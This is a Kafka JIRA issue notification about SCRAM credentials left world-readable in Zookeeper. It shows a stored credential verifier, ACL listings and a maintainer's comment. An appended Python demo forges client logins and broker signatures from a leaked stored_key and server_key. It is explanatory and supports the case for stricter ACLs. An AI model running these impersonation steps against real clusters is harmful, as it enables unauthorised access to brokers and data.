[ https://issues.apache.org/jira/browse/KAFKA-4943?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15938726#comment-15938726 ]
Rajini Sivaram commented on KAFKA-4943:
---------------------------------------

The current SCRAM implementation uses the default ACL settings for Kafka with the expectation that SCRAM credentials are stored in Zookeeper only in installations where Zookeeper is safe (secure disk, network segmentation to restrict access etc.). Since ZK traffic is not encrypted, it would be unsafe to use ZK as the credential store in clusters where ZK is not fully secure. KIP-86 (https://cwiki.apache.org/confluence/display/KAFKA/KIP-86%3A+Configurable+SASL+callback+handlers) will enable a pluggable credential store for environments where ZK is insecure. Having said that, we could probably do better for the default case as suggested here.

> SCRAM secrets should be better protected with Zookeeper ACLs
> -------------------------------------------------------------
>
>                 Key: KAFKA-4943
>                 URL: https://issues.apache.org/jira/browse/KAFKA-4943
>             Project: Kafka
>          Issue Type: Improvement
>            Reporter: Johan Ström
>
> With the new SCRAM authenticator the secrets are stored in Zookeeper:
> {code}
> get /kafka/config/users/alice
> {"version":1,"config":{"SCRAM-SHA-512":"salt=ODhnZjNkdWZibTV1cG1zdnV6bmh6djF3Mg==,stored_key=BAbHWHuGEb4m5+U+p0M9oFQmOPhU6M7q5jtZY8deDDoZCvxaqVNLz41yPzdgcp1WpiEBmfwYOuFlo9hMFKM7mA==,server_key=JW3KhpMeyUgh0OAC0kejuFUvUSlXBv/Z68tlfOWcMw5f5jrBwyBnjNQ9VZsSYz1AcI9IYaQ5S6H3yN39SieNiA==,iterations=4096"}}
> {code}
> These are stored without any ACL, and zookeeper-security-migration.sh does
> not seem to change that either:
> {code}
> getAcl /kafka/config/users/alice
> 'world,'anyone
> : cdrwa
> getAcl /kafka/config/users
> 'world,'anyone
> : cdrwa
> getAcl /kafka
> 'world,'anyone
> : r
> 'sasl,'bob
> : cdrwa
> getAcl /kafka/config/changes
> 'world,'anyone
> : r
> 'sasl,'bob
> : cdrwa
> {code}
> The above output is after running security migrator, for some reason
> /kafka/config/users is ignored, but others are fixed.
> Even if these were to be stored with secure ZkUtils#DefaultAcls, they would
> be world readable.
> From my (limited) point of view, they should be readable by Kafka only.

--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
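Why a world-readable /kafka/config/users/<user> znode is a problem even though it holds no password: the following is an added example, not code from the Kafka project or from the issue reporter. It implements the SCRAM-SHA-512 exchange of RFC 5802 in plain Python, stores the verifier in the same salt=,stored_key=,server_key=,iterations= format shown in the znode above, and then shows the property RFC 5802 (section 9) warns about: an attacker who reads stored_key from the repository and observes a single successful authentication recovers ClientKey and can authenticate as that user to any broker using the same salt and iteration count; server_key alone is enough to impersonate the broker. The password, user name and nonces are constructed for the demo (the reporter's real alice verifier is not used).

```python
import base64
import hashlib
import hmac
import secrets

HASH = "sha512"  # Kafka's SCRAM-SHA-512 mechanism


def _h(data: bytes) -> bytes:
    return hashlib.new(HASH, data).digest()


def _hmac(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, HASH).digest()


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def make_credential(password: str, iterations: int = 4096, salt: bytes = b"") -> str:
    """Build the value Kafka writes under /kafka/config/users/<name>: only the verifier, never the password."""
    salt = salt or secrets.token_bytes(24)
    salted = hashlib.pbkdf2_hmac(HASH, password.encode(), salt, iterations)  # Hi() of RFC 5802
    client_key = _hmac(salted, b"Client Key")
    b64 = lambda x: base64.b64encode(x).decode()
    return (f"salt={b64(salt)},stored_key={b64(_h(client_key))},"
            f"server_key={b64(_hmac(salted, b'Server Key'))},iterations={iterations}")


def parse_credential(cred: str) -> dict:
    """Parse the comma-separated k=v string back into bytes and an int (base64 '=' padding is safe with maxsplit=1)."""
    kv = dict(field.split("=", 1) for field in cred.split(","))
    return {"salt": base64.b64decode(kv["salt"]),
            "stored_key": base64.b64decode(kv["stored_key"]),
            "server_key": base64.b64decode(kv["server_key"]),
            "iterations": int(kv["iterations"])}


def auth_message(user: str, cnonce: str, snonce: str, cred: dict) -> bytes:
    """AuthMessage = client-first-bare , server-first , client-final-without-proof (RFC 5802 section 3)."""
    salt_b64 = base64.b64encode(cred["salt"]).decode()
    return (f"n={user},r={cnonce},"
            f"r={cnonce}{snonce},s={salt_b64},i={cred['iterations']},"
            f"c=biws,r={cnonce}{snonce}").encode()


def client_proof(password: str, cred: dict, auth_msg: bytes) -> bytes:
    """What a legitimate client sends: ClientKey XOR HMAC(StoredKey, AuthMessage)."""
    salted = hashlib.pbkdf2_hmac(HASH, password.encode(), cred["salt"], cred["iterations"])
    client_key = _hmac(salted, b"Client Key")
    return _xor(client_key, _hmac(_h(client_key), auth_msg))


def server_verify(cred: dict, auth_msg: bytes, proof: bytes) -> bool:
    """Broker side: unmask ClientKey from the proof and check H(ClientKey) == StoredKey."""
    client_key = _xor(proof, _hmac(cred["stored_key"], auth_msg))
    return hmac.compare_digest(_h(client_key), cred["stored_key"])


def recover_client_key(stored_key: bytes, auth_msg: bytes, proof: bytes) -> bytes:
    """Attacker step: StoredKey (read from the znode) plus ONE observed exchange gives
    ClientKey = proof XOR HMAC(StoredKey, AuthMessage). No password guessing involved."""
    return _xor(proof, _hmac(stored_key, auth_msg))


def forge_proof(client_key: bytes, stored_key: bytes, auth_msg: bytes) -> bytes:
    """Attacker step: answer any fresh server challenge with the recovered ClientKey."""
    return _xor(client_key, _hmac(stored_key, auth_msg))


def demo() -> dict:
    password = "alice-demo-password"  # constructed for the demo
    cred = parse_credential(make_credential(password))

    # 1. A legitimate login, as seen by someone who can observe the exchange.
    am1 = auth_message("alice", "c1", "s1", cred)
    proof1 = client_proof(password, cred, am1)

    # 2. The attacker has stored_key from the world-readable znode; one observed
    #    (AuthMessage, proof) pair yields ClientKey, good for every later challenge.
    client_key = recover_client_key(cred["stored_key"], am1, proof1)
    am2 = auth_message("alice", "attacker-nonce", "fresh-server-nonce", cred)
    forged = forge_proof(client_key, cred["stored_key"], am2)

    # 3. Impersonating the broker needs only server_key: ServerSignature = HMAC(ServerKey, AuthMessage).
    server_sig = _hmac(cred["server_key"], am2)

    return {"legit_login_ok": server_verify(cred, am1, proof1),
            "wrong_password_rejected": not server_verify(cred, am1, client_proof("guess", cred, am1)),
            "forged_login_ok": server_verify(cred, am2, forged),
            "server_signature_len": len(server_sig)}


if __name__ == "__main__":
    print(demo())
```

The takeaway for the ACL question: stored_key and server_key are not password-equivalent on their own, but together with read access to the znode they reduce SCRAM to "observe one login" (client impersonation) or nothing at all (server impersonation), which is why the credential znodes should be readable only by the broker principal rather than inherit the world-readable default.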